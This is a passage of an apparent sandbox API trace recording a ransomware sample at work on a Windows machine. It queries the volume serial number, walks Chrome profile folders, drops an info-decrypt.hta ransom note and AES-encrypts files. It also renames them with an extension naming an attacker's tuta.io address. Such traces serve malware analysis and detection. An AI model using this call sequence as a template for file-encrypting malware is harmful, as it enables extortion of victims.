puBuffLength=0x949ea30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0197.528] IWbemServices:GetObject (in: This=0x603368c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e9e4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e9e4*=0x6028180, ppCallResult=0x0) returned 0x0 [0197.858] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029ce0, puCount=0x949e9e4 | out: puCount=0x949e9e4*=0x2) returned 0x0 [0197.858] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=4, puBuffLength=0x949e9e0*=0x0, pszText=0x0 | out: puBuffLength=0x949e9e0*=0xf, pszText=0x0) returned 0x0 [0197.858] WbemDefPath:IWbemPath:GetText (in: This=0x6029ce0, lFlags=4, puBuffLength=0x949e9e0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.858] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36615a4*=0, plFlavor=0x36615a8*=0 | out: pVal=0x949e9e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36615a4*=8, plFlavor=0x36615a8*=0) returned 0x0 [0197.858] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.858] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.858] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36615a4*=8, plFlavor=0x36615a8*=0 | out: pVal=0x949e9e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36615a4*=8, plFlavor=0x36615a8*=0) returned 0x0 [0197.858] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.859] SysStringByteLen (bstr="9C354B42") returned 0x10 [0197.859] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log", lpFilePart=0x0) returned 0x66 [0197.859] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x89 [0197.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea48) returned 1 [0197.859] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), fInfoLevelId=0x0, lpFileInformation=0x949eac4 | out: lpFileInformation=0x949eac4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82bed750, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82bed750, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x2f142220, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0197.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea44) returned 1 [0197.859] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0197.860] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0197.860] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpFilePart=0x0) returned 0x5b [0197.860] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpFilePart=0x0) returned 0x5c [0197.860] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fc90 [0197.865] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.865] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82556720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0197.865] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824d3190, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0197.865] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0197.865] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0197.866] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0197.866] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0197.866] FindClose (in: hFindFile=0xb7fc90 | out: hFindFile=0xb7fc90) returned 1 [0197.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0197.867] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0197.867] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb8c) returned 1 [0197.867] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", nBufferLength=0x105, lpBuffer=0x949e694, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpFilePart=0x0) returned 0x5b [0197.867] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", nBufferLength=0x105, lpBuffer=0x949e668, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpFilePart=0x0) returned 0x5c [0197.867] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*", lpFindFileData=0x949e8b4 | out: lpFindFileData=0x949e8b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fc90 [0197.867] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82556720, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.867] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82556720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="000003.log", cAlternateFileName="")) returned 1 [0197.867] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824d3190, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0197.868] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0197.868] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0197.868] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0197.868] FindNextFileW (in: hFindFile=0xb7fc90, lpFindFileData=0x949e8c4 | out: lpFindFileData=0x949e8c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0197.868] FindClose (in: hFindFile=0xb7fc90 | out: hFindFile=0xb7fc90) returned 1 [0197.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb4c) returned 1 [0197.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb58) returned 1 [0197.868] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", lpFilePart=0x0) returned 0x66 [0197.869] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\info-decrypt.hta", lpFilePart=0x0) returned 0x6c [0197.869] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea68) returned 1 [0197.869] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eae4 | out: lpFileInformation=0x949eae4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0197.869] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea64) returned 1 [0197.869] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", lpFilePart=0x0) returned 0x66 [0197.870] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\info-decrypt.hta", lpFilePart=0x0) returned 0x6c [0197.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e99c) returned 1 [0197.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0 [0197.870] GetFileType (hFile=0x2f0) returned 0x1 [0197.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e998) returned 1 [0197.870] GetFileType (hFile=0x2f0) returned 0x1 [0197.870] WriteFile (in: hFile=0x2f0, lpBuffer=0x3666558*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949ea60, lpOverlapped=0x0 | out: lpBuffer=0x3666558*, lpNumberOfBytesWritten=0x949ea60*=0x1000, lpOverlapped=0x0) returned 1 [0197.871] WriteFile (in: hFile=0x2f0, lpBuffer=0x3666558*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ea34, lpOverlapped=0x0 | out: lpBuffer=0x3666558*, lpNumberOfBytesWritten=0x949ea34*=0x55e, lpOverlapped=0x0) returned 1 [0197.872] CloseHandle (hObject=0x2f0) returned 1 [0197.872] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", lpFilePart=0x0) returned 0x66 [0197.872] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab4) returned 1 [0197.872] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), fInfoLevelId=0x0, lpFileInformation=0x3667574 | out: lpFileInformation=0x3667574*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82556720, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82556720, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4ad)) returned 1 [0197.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab0) returned 1 [0197.873] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", nBufferLength=0x105, lpBuffer=0x949e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", lpFilePart=0x0) returned 0x66 [0197.873] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9e8) returned 1 [0197.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0197.873] GetFileType (hFile=0x2f0) returned 0x1 [0197.873] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e4) returned 1 [0197.873] GetFileType (hFile=0x2f0) returned 0x1 [0197.873] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x949eaf0 | out: lpFileSizeHigh=0x949eaf0*=0x0) returned 0x4ad [0197.873] ReadFile (in: hFile=0x2f0, lpBuffer=0x3667cc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949ea9c, lpOverlapped=0x0 | out: lpBuffer=0x3667cc0*, lpNumberOfBytesRead=0x949ea9c*=0x4ad, lpOverlapped=0x0) returned 1 [0197.876] CloseHandle (hObject=0x2f0) returned 1 [0197.876] CryptAcquireContextW (in: phProv=0x949ea3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea3c*=0x66bb950) returned 1 [0197.877] CryptGenRandom (in: hProv=0x66bb950, dwLen=0x10, pbBuffer=0x3669384 | out: pbBuffer=0x3669384) returned 1 [0198.322] CryptImportKey (in: hProv=0x66bb950, pbData=0x3643bec, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea0c | out: phKey=0x949ea0c*=0xb7f490) returned 1 [0198.323] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.323] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.323] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e9fc | out: phKey=0x949e9fc*=0xb7f1d0) returned 1 [0198.323] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0198.323] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x4, pbData=0x3643ccc*=0x1, dwFlags=0x0) returned 1 [0198.323] CryptSetKeyParam (hKey=0xb7f1d0, dwParam=0x1, pbData=0x3643c98, dwFlags=0x0) returned 1 [0198.323] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3643cdc*, pdwDataLen=0x949ea68*=0x4b0, dwBufLen=0x4b0 | out: pbData=0x3643cdc*, pdwDataLen=0x949ea68*=0x4b0) returned 1 [0198.323] CryptEncrypt (in: hKey=0xb7f1d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36441b0*, pdwDataLen=0x949ea70*=0x0, dwBufLen=0x10 | out: pbData=0x36441b0*, pdwDataLen=0x949ea70*=0x10) returned 1 [0198.324] CryptDestroyKey (hKey=0xb7f490) returned 1 [0198.324] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0198.324] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0198.324] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", nBufferLength=0x105, lpBuffer=0x949e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", lpFilePart=0x0) returned 0x66 [0198.325] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9d4) returned 1 [0198.325] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0198.326] GetFileType (hFile=0x324) returned 0x1 [0198.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9d0) returned 1 [0198.326] GetFileType (hFile=0x324) returned 0x1 [0198.326] WriteFile (in: hFile=0x324, lpBuffer=0x3644814*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ea64, lpOverlapped=0x0 | out: lpBuffer=0x3644814*, lpNumberOfBytesWritten=0x949ea64*=0x20, lpOverlapped=0x0) returned 1 [0198.327] CloseHandle (hObject=0x324) returned 1 [0198.327] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0198.327] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0198.327] CoTaskMemFree (pv=0xbed438) [0198.327] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0198.327] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea10 | out: ppv=0x949ea10*=0xb51e34) returned 0x0 [0198.328] 